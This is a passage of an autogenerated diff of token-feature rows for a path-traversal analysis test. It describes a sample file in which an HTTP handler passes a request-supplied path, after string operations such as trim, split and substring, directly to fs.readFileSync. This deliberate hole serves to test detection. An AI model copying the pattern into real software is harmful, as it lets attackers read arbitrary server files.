autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | exceptional return of fs.read ... trim()) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | fs.read ... trim()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | fs.read ... trim()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | fs.read ... trim()) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | fs.read ... trim()) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:17:2:17:29 | fs.read ... trim()) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:17:5:17:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:5:17:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:17:5:17:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:5:17:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:17:5:17:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:26 | path.trim | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:26 | path.trim | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:26 | path.trim | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:26 | path.trim | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:26 | path.trim | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | exceptional return of path.trim() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | exceptional return of path.trim() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | exceptional return of path.trim() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | exceptional return of path.trim() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | exceptional return of path.trim() | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | path.trim() | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | path.trim() | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | path.trim() | calleeImports | fs | @@ -11403,6 +87517,51 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | path.trim() | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | path.trim() | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:17:18:17:28 | path.trim() | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:17:23:17:26 | trim | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:17:23:17:26 | trim | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:17:23:17:26 | trim | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:17:23:17:26 | trim | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:17:23:17:26 | trim | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | exceptional return of fs.read ... Case()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | exceptional return of fs.read ... Case()) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | exceptional return of fs.read ... Case()) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | exceptional return of fs.read ... Case()) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | exceptional return of fs.read ... Case()) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | fs.read ... Case()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | fs.read ... Case()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | fs.read ... Case()) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | fs.read ... Case()) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:2:18:36 | fs.read ... Case()) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:18:5:18:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:5:18:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:18:5:18:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:5:18:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:5:18:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:33 | path.toLowerCase | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:33 | path.toLowerCase | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:33 | path.toLowerCase | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:33 | path.toLowerCase | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:33 | path.toLowerCase | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | exceptional return of path.toLowerCase() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | exceptional return of path.toLowerCase() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | exceptional return of path.toLowerCase() | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | exceptional return of path.toLowerCase() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | exceptional return of path.toLowerCase() | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | calleeImports | fs | @@ -11412,6 +87571,51 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:18:18:18:35 | path.toLowerCase() | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:18:23:18:33 | toLowerCase | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:18:23:18:33 | toLowerCase | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:18:23:18:33 | toLowerCase | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:18:23:18:33 | toLowerCase | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:18:23:18:33 | toLowerCase | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:3 | fs | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:16 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:16 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:16 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:16 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:16 | fs.readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | exceptional return of fs.read ... t('/')) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | exceptional return of fs.read ... t('/')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | exceptional return of fs.read ... t('/')) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | exceptional return of fs.read ... t('/')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | exceptional return of fs.read ... t('/')) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | fs.read ... t('/')) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | fs.read ... t('/')) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | fs.read ... t('/')) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | fs.read ... t('/')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:2:20:33 | fs.read ... t('/')) | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:20:5:20:16 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:5:20:16 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:20:5:20:16 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:5:20:16 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:5:20:16 | readFileSync | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:21 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:21 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:21 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:21 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:21 | path | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:27 | path.split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:27 | path.split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:27 | path.split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:27 | path.split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:27 | path.split | fileImports | fs http url | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | exceptional return of path.split('/') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | exceptional return of path.split('/') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | exceptional return of path.split('/') | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | exceptional return of path.split('/') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | exceptional return of path.split('/') | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | path.split('/') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | path.split('/') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | path.split('/') | calleeImports | fs | @@ -11421,6 +87625,11 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | path.split('/') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | path.split('/') | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:20:18:20:32 | path.split('/') | receiverName | fs | +| autogenerated/TaintedPath/tainted-string-steps.js:20:23:20:27 | split | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:20:23:20:27 | split | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:20:23:20:27 | split | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat unknown fs readFileSync unknown concat path fs readFileSync unknown concat unknown path fs readFileSync path trim fs readFileSync path toLowerCase fs readFileSync path split / fs readFileSync path 0 split / 0 fs readFileSync path split / i fs readFileSync path split /\\// i fs readFileSync path 0 split ? 0 fs readFileSync path split unknown i fs readFileSync path split unknown whatever fs readFileSync path split unknown fs readFileSync path split ? i | +| autogenerated/TaintedPath/tainted-string-steps.js:20:23:20:27 | split | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-string-steps.js:20:23:20:27 | split | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:20:29:20:31 | '/' | CalleeFlexibleAccessPath | path.split | | autogenerated/TaintedPath/tainted-string-steps.js:20:29:20:31 | '/' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-string-steps.js:20:29:20:31 | '/' | calleeImports | url | @@ -11430,6 +87639,51 @@ tokenFeatures | autogenerated/TaintedPath/tainted-string-steps.js:20:29:20:31 | '/' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-string-steps.js:20:29:20:31 | '/' | fileImports | fs http url | | autogenerated/TaintedPath/tainted-string-steps.js:20:29:20:31 | '/' | receiverName | path | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:3 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-string-steps.js:21:2:21:3 | fs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path substring i j fs readFileSync path substring 4 fs readFileSync path substring 0 i fs readFileSync path substr 4 fs readFileSync path slice 4 fs readFileSync path concat 